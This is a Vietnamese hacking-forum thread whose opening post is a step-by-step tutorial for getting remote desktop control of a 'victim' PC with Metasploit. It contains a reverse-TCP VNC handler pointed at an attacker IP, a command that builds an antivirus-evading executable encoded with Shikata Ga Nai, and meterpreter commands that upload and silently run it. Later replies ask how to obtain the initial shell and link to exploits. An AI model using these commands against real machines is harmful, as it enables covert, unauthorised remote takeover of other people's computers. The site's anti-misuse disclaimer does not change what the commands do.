Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

Thảo luận trong 'Audit/Pentest Security' bắt đầu bởi Hackerstudent93, 06/06/15, 12:06 PM.

  1. Hackerstudent93

    Hackerstudent93 VIP Members

    Tham gia: 30/09/13, 12:09 AM
    Bài viết: 347
    Đã được thích: 34
    Điểm thành tích:
    38
    Có nhiều tùy chọn để có được quyền truy cập máy tính từ xa với một mục tiêu sẵn có. Để một tin tặc có thể tấn công nạn nhân từ phía sau tường lửa, netcat hỗ trợ điều này. Nhưng hôm nay tôi sẽ giới thiệu một lựa chọn đơn giản hơn là tận dụng " Metasploit reverse Virtual Network Computing (VNC) payload "

    1. Đầu tiên chúng ta cài đặt vncviewer trên hệ thống máy tính của tin tặc.

    Mã:
    sudo apt-get install vncviewer
    2. Next, we’ll start a new instance of msfconsole to wait for the VNC reverse-TCP connection

    Mã:
    msf > use multi/handler
    
    msf exploit(handler) > set PAYLOAD windows/vncinject/reverse_tcp PAYLOAD => windows/vncinject/reverse_tcp
    msf exploit(handler) > set LHOST 74.208.19.32 LHOST => 74.208.19.32
    msf exploit(handler) > set LPORT 8080 LPORT => 8080
    msf exploit(handler) > exploit
    
    
    [*]Handler binding to LHOST 0.0.0.0 
    [*]Started reverse handler
    [*]Starting the payload handler...
    
    
    
    3. Next, we’ll create a new executable payload to launch the Metasploit reverse VNC payload, encoded with Shikata Ga Nai, as shown here

    Mã:
    $ ./msfpayload windows/vncinject/reverse_tcp LHOST=74.208.19.32 LPORT=8081 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o vncinject.exe
    [*]x86/shikata_ga_nai succeeded with size 102 (iteration=1) 
    [*]x86/shikata_ga_nai succeeded with size 129 (iteration=2) 
    [*]x86/shikata_ga_nai succeeded with size 156 (iteration=3) 
    [*]x86/shikata_ga_nai succeeded with size 183 (iteration=4)
    
    Tin tặc sẽ chờ đợi nạn nhân mở vncinject.exe đã được mã hóa với Shikata Ga Nai nếu bạn đã có meterpreter shell bạn có thể upload nó đến máy nạn nhân và thực thi nó để truy cập đến máy tính từ xa.

    Mã:
    meterpreter > upload vncinject.exe C:TEMP 
    [*]uploading
     
    [*]uploaded
    
    : vncinject.exe -> C:TEMP
     
    : vncinject.exe -> C:TEMPvncinject.exe
    
    
     
    meterpreter > execute -H -f C:TEMPvncinject.exe Process 7512 created.
    
    Ngay lập tực sau khi thực thi vncinject.exe payload nạ nhân sẽ kết nối ngược trở lại đến msfconsole payload handler của tin tặc trên hệ thống tấn công của tin tặc sẽ khởi động vncviewer.

    Một màn hình như ở dưới sẽ hiện ra trên máy tính của tin tặc :D

    [​IMG]
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  2. Hackerstudent93

    Hackerstudent93 VIP Members

    Tham gia: 30/09/13, 12:09 AM
    Bài viết: 347
    Đã được thích: 34
    Điểm thành tích:
    38
    Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

    loạt bài tiếp theo mình sẽ viết những bài về hacking wifi nằm trong chương trình Hacking_Exposed_Wifi của tác giả " JOHNNY C A C H E JOSHUA WRIGHT
    VINCENT LIU "
     
    Last edited by a moderator: 30/05/20, 11:05 AM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. thuipro7409

    thuipro7409 W-------

    Tham gia: 01/06/15, 11:06 AM
    Bài viết: 6
    Đã được thích: 0
    Điểm thành tích:
    6
    Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

    huynh có dạy hacker mũ trắng ko ạ em xin học ạ
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. thuipro7409

    thuipro7409 W-------

    Tham gia: 01/06/15, 11:06 AM
    Bài viết: 6
    Đã được thích: 0
    Điểm thành tích:
    6
    Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

    anh nào hacker mũ trắng dạy em hacker được ko ạ
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,871
    Đã được thích: 448
    Điểm thành tích:
    83
    Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

    sao Anh Việt lẫn lộn thế ... :D
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. Hackerstudent93

    Hackerstudent93 VIP Members

    Tham gia: 30/09/13, 12:09 AM
    Bài viết: 347
    Đã được thích: 34
    Điểm thành tích:
    38
    Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

    Cố tình để cho mọi người tự dịch và học tiếng anh mà :D @_@ DDos nhận em ở trên làm đệ tử đi nha :)
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  7. thuipro7409

    thuipro7409 W-------

    Tham gia: 01/06/15, 11:06 AM
    Bài viết: 6
    Đã được thích: 0
    Điểm thành tích:
    6
    Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

    anh ddos nhận em làm đệ tử nha anh :confused:
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  8. thuipro7409

    thuipro7409 W-------

    Tham gia: 01/06/15, 11:06 AM
    Bài viết: 6
    Đã được thích: 0
    Điểm thành tích:
    6
    Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

    anh hackerstudent93 nhận em được chứ sao ko anh
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  9. GinVN

    GinVN W-------

    Tham gia: 28/05/15, 04:05 PM
    Bài viết: 19
    Đã được thích: 0
    Điểm thành tích:
    16
    Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

    Hai caca chỉ bảo e vào ngành ATTT với ạ :D Hiện e chưa biết bắt đầu ntn. Em mới biết lập trình căn bản Pascal và C thôi ạ :p
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  10. thuipro7409

    thuipro7409 W-------

    Tham gia: 01/06/15, 11:06 AM
    Bài viết: 6
    Đã được thích: 0
    Điểm thành tích:
    6
    Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

    war game em nghe nói học hacker bằng cái war game mà
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  11. zEpEr

    zEpEr Wh------

    Tham gia: 25/02/15, 10:02 PM
    Bài viết: 53
    Đã được thích: 1
    Điểm thành tích:
    18
    Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

    == trông có vẻ dễ , quan trọng là lấy meterpreter ở đâu ra ? scan lỗ hổng sau đó exploit ạ
    không liên quan mấy nhưng em chúc mấy ông đòi nhận đệ tử + hướng đẫn này nọ kia sớm thành hacker , có vẻ họ đang mong chờ điều đó
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  12. zEpEr

    zEpEr Wh------

    Tham gia: 25/02/15, 10:02 PM
    Bài viết: 53
    Đã được thích: 1
    Điểm thành tích:
    18
    Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

    ==' trông có vẻ dễ , quan trọng là lấy meterpreter ở đâu ra ? scan lỗ hổng sau đó exploit lấy meterpreter> ạ
    không liên quan mấy nhưng em chúc mấy ông đòi nhận đệ tử + hướng đẫn này nọ kia sớm thành hacker , có vẻ họ đang mong chờ điều đó
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  13. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,871
    Đã được thích: 448
    Điểm thành tích:
    83
    Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

    Các bạn có thể tham khảo một vài exploit để lấy meterpreter.... :D

    https://goo.gl/wCeUcu
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  14. Hackerstudent93

    Hackerstudent93 VIP Members

    Tham gia: 30/09/13, 12:09 AM
    Bài viết: 347
    Đã được thích: 34
    Điểm thành tích:
    38
    Re: Hướng dẫn Establishing Remote Desktop Access trên máy tính nạn nhân

    Ddos up lại cái link cho mọi người tham khảo nhé :eek:
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  15. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,871
    Đã được thích: 448
    Điểm thành tích:
    83
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan